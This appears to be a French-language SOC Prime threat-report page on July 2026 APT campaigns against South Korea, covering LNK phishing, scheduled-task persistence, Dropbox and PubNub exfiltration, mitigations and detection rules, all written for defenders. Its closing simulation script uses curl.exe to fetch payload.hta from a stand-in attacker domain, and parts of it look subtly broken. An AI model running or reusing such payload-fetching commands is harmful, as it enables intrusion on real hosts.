SOC Prime Bias: Critical

31 Aug 2026 06:13 UTC

Rapport sur les Menaces APT en Corée du Sud : Tendances de Juillet 2026

Author Photo
SOC Prime Team linkedin icon Suivre
Rapport sur les Menaces APT en Corée du Sud : Tendances de Juillet 2026
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

AhnLab signale une augmentation de l’activité APT ciblant les organisations sud-coréennes via des campagnes de spear-phishing. Les attaques reposent principalement sur des fichiers LNK malveillants pour livrer des charges utiles, y compris des scripts PowerShell, des scripts AutoIt et des portes dérobées. Les techniques courantes incluent la persistance via le Planificateur de tâches et l’exfiltration de données via des services tels que Dropbox et PubNub.

Enquête

L’enquête s’est concentrée sur l’infrastructure APT utilisée contre les entités sud-coréennes tout au long de juillet 2026. Les analystes ont regroupé l’activité en plusieurs types d’attaques, de A à G, en fonction des méthodes de livraison et des caractéristiques fonctionnelles. Les chercheurs ont également identifié des comportements incluant le DLL side-loading et l’abus des utilitaires natifs de Windows tels que curl.exe pour la récupération de la charge utile.

Atténuation

Les utilisateurs doivent vérifier l’identité de l’expéditeur et éviter d’ouvrir les pièces jointes reçues de sources inconnues ou non fiables. Les organisations doivent maintenir les systèmes d’exploitation et les navigateurs web à jour avec les derniers correctifs de sécurité. Il est également recommandé de maintenir les solutions antivirus et de protection des points de terminaison actuelles telles que V3.

Réponse

Si des fichiers LNK suspects ou des entrées non autorisées du Planificateur de tâches sont détectés, les intervenants en cas d’incident doivent isoler immédiatement l’hôte affecté. Des analyses forensiques de la mémoire doivent être effectuées pour identifier des portes dérobées injectées ou des DLL malveillantes. Les journaux réseau doivent également être examinés pour détecter des connexions sortantes inhabituelles vers des services d’hébergement de fichiers ou des canaux de commande et de contrôle tels que PubNub.

Flux d’attaque

Nous sommes encore en train de mettre à jour cette partie.

Détections

Comportement suspect d’évasion de défense MSHTA LOLBAS par détection de commandes associées (via process_creation)

Équipe SOC Prime
28 août 2026

Utilisation suspecte de CURL (via cmdline)

Équipe SOC Prime
28 août 2026

Tâche planifiée suspecte (via audit)

Équipe SOC Prime
28 août 2026

Infiltration / exfiltration de données possible / C2 via des services / outils tiers (via proxy)

Équipe SOC Prime
28 août 2026

Infiltration / exfiltration de données possible / C2 via des services / outils tiers (via dns)

Équipe SOC Prime
28 août 2026

IOC (HashMd5) à détecter : Rapport de tendance des menaces de juillet 2026 sur les attaques APT (Corée du Sud)

Règles AI SOC Prime
28 août 2026

Curl.Exe utilisé pour télécharger et exécuter des fichiers malveillants [Windows Sysmon]

Règles AI SOC Prime
28 août 2026

Détecter les commandes PowerShell malveillantes dans les fichiers LNK [Windows Powershell]

Règles AI SOC Prime
28 août 2026

Exécution de la simulation

Prérequis : La vérification préalable de la télémétrie et de la base de référence doit être réussie.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT directement refléter les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à un mauvais diagnostic.

  • Récit d’attaque et commandes : L’adversaire a l’intention d’utiliser curl.exe pour télécharger un fichier HTA malveillant dans le %TEMP% répertoire pour établir un point d’ancrage. Pour tester si la logique de détection actuelle fonctionne (car elle recherche spécifiquement les mots « download » ou « execute »), l’attaquant utilisera une ligne de commande qui inclut explicitement ces mots dans le cadre d’un faux argument ou d’une description, simulant un script mal construit ou une tentative spécifique de mimer le modèle recherché par le SOC.

  • Script de test de régression :

     # Simulez un adversaire utilisant curl avec les mots-clés spécifiques requis par la règle
      $tempPath = $env:TEMPmalicious.hta
      $url = "http://attacker-controlled-domain.com/payload.hta"
    
      # Cette commande est spécialement conçue pour déclencher la logique de 'contient' de la règle
      # en incluant les mots 'download' et 'execute' dans la chaîne de ligne de commande.
      Start-Process "curl.exe" -ArgumentList "-L $url -o $tempPath --comment 'download and execute this file'"
  • Commandes de nettoyage :

     # Supprimez le fichier fictif créé pendant la simulation
      if (Test-Path "$env:TEMPmalicious.hta") {
          Remove-Item -Path "$env:TEMPmalicious.hta" -Force
      }